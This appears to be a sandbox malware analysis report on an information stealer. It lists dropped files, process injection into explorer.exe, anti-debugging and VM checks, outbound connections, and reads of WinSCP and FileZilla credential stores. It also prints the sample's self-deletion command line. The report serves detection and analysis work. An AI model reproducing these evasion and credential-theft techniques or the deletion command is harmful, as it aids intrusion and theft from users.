Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdb source: oracleSuper.exe
Source: Binary string: wntdll.pdb source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msidcrl40.pdb source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: msidcrl40.pdbL source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171954674.0000000027501000.00000020.00000001.01000000.00000008.sdmp, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: livecall.pdb source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: livecall.pdbl source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdbi source: oracleSuper.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00424DD1 lstrcmpiW,LoadLibraryW,GetProcAddress,FreeLibrary, 2_2_00424DD1
Source: msidcrl40.dll.2.dr Static PE information: real checksum: 0xd4c1e should be: 0xcebd1
Source: msidcrl40.dll.0.dr Static PE information: real checksum: 0xd4c1e should be: 0xcebd1
Source: fru.4.dr Static PE information: real checksum: 0x0 should be: 0x3df08
Source: fru.4.dr Static PE information: section name: yuith
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042416C push ecx; ret 2_2_0042417F
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F11 push ecx; ret 2_2_00423F24
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27583965 push ecx; ret 3_2_27583978
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00442015 push ecx; ret 9_2_00442028
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Jump to dropped file
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\localTask_v2\msidcrl40.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2\msidcrl40.dll Jump to dropped file
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\fru Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\fru Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FRU
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043B179 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0043B179
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041B6EC 2_2_0041B6EC
Source: C:\Users\user\Desktop\oracleSuper.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\oracleSuper.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D15781D
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6D153B97
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 10BA317
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fru Jump to dropped file
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API coverage: 0.1 %
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041B6EC 2_2_0041B6EC
Source: C:\Windows\SysWOW64\timeout.exe TID: 1924 Thread sleep count: 83 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00421443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00421443
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042E016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C039 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042C039
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004378FC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_004378FC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 9_2_0042BC98
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004374B6 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 9_2_004374B6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004365F0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 9_2_004365F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 9_2_0042D690
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436EA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 9_2_00436EA6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 9_2_0042C6B5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00429FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00429FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436B15 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA, 9_2_00436B15
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042811D __EH_prolog3,GetSystemInfo, 2_2_0042811D
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZx
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003537000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: explorer.exe, 00000009.00000002.2541375791.0000000003566000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: C:\Users\user\Desktop\oracleSuper.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\oracleSuper.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\oracleSuper.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 2_2_00423F48
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00424DD1 lstrcmpiW,LoadLibraryW,GetProcAddress,FreeLibrary, 2_2_00424DD1
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002F89C2 mov eax, dword ptr fs:[00000030h] 0_2_002F89C2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043AE1C mov eax, dword ptr fs:[00000030h] 9_2_0043AE1C
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002F8B82 ExitProcess,ExitProcess,GetProcessHeap,RtlAllocateHeap,VirtualProtect,VirtualProtect,ExitProcess, 0_2_002F8B82
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 2_2_00423F48
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27583B12 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_27583B12
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2757F388 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_2757F388
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00441D2B memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00441D2B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00443EED SetUnhandledExceptionFilter, 9_2_00443EED
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0044236F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0044236F

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 149.154.167.99 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 65.21.246.249 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 104.102.49.254 443 Jump to behavior
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00430A14 memset,memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 9_2_00430A14
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe NtProtectVirtualMemory: Direct from: 0x6E5B2A39 Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe NtQuerySystemInformation: Direct from: 0x2750631E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6488 base: 10B79C0 value: 55 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6488 base: 370008 value: 00 Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004338BA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 9_2_004338BA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004337BD CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 9_2_004337BD
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 10B79C0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 370008 Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042482A cpuid 2_2_0042482A
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 2_2_00423587
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: GetLocaleInfoA, 3_2_2758E532
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 9_2_00431D31
Source: C:\Windows\SysWOW64\explorer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Queries volume information: C:\Users\user\Desktop\oracleSuper.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6942704c VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002EA412 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_002EA412
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00431BEC GetProcessHeap,HeapAlloc,GetUserNameA, 9_2_00431BEC
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758936D __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 3_2_2758936D
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_004235F1 GetVersionExA,InterlockedExchange, 2_2_004235F1
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs